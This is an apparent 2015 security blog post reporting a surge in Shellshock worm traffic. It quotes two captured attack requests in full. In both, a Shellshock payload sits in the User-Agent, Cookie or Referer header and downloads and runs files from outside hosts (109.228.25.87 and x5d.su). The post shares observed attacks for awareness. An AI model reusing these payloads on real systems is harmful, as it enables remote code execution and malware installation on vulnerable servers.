Shellshock has been kinda quiet recently, but just in the last day or two there's been a big uptick and it appears it might be related to this Shellshock Worm that Volexity reported on.
I've seen 2 variants so far
GET /cgi-bin/test-cgi.pl HTTP/1.1
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("cd /tmp;cd /var/tmp;rm -rf .c.txt;rm -rf .d.txt ; wget http://109.228.25.87/.c.txt ; curl -O http://109.228.25.87/.c.txt ; fetch http://109.228.25.87/.c.txt ; lwp-download http://109.228.25.87/.c.txt; chmod +x .c.txt* ; sh .c.txt* ");'
GET /cgi-mod/index.cgi HTTP/1.0
Cookie: () { :;} ;echo;/usr/bin/php -r '$a = "http://x5d.su/x/AS1";''$b = "http://x5d.su/x/AS2";''$c = sys_get_temp_dir();''$d = "AS1";''$e = "AS2";''$f = "chmod 777";''$g = "file_put_contents";''$h = "system";''$i = "file_exists";''$j = "fopen";''$k = "uptime";''if ($i($c . "/$d"))''{''exit(1);''}else{''$h("$k");''$g("$c/$d", $j("$a", "r"));''$g("$c/$e", $j("$b", "r"));''$h("$f " . $c ."/$d");''$h("$f " . $c ."/$e");''$h($c . "/$d");''$h($c . "/$e");''}'
Referer: () { :;} ;echo;/usr/local/bin/php -r '$a = "http://x5d.su/x/AS1";''$b = "http://x5d.su/x/AS2";''$c = sys_get_temp_dir();''$d = "AS1";''$e = "AS2";''$f = "chmod 777";''$g = "file_put_contents";''$h = "system";''$i = "file_exists";''$j = "fopen";''$k = "uptime";''if ($i($c . "/$d"))''{''exit(1);''}else{''$h("$k");''$g("$c/$d", $j("$a", "r"));''$g("$c/$e", $j("$b", "r"));''$h("$f " . $c ."/$d");''$h("$f " . $c ."/$e");''$h($c . "/$d");''$h($c . "/$e");''}'
I pasted several examples of each
first example
example 1
example 2
example 3
example 4
example 5
example 6
example 7
second example
example 1
example 2
example 3
example 4
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Showing posts with label Worm. Show all posts
Showing posts with label Worm. Show all posts
Thursday, April 9, 2015
Subscribe to:
Posts (Atom)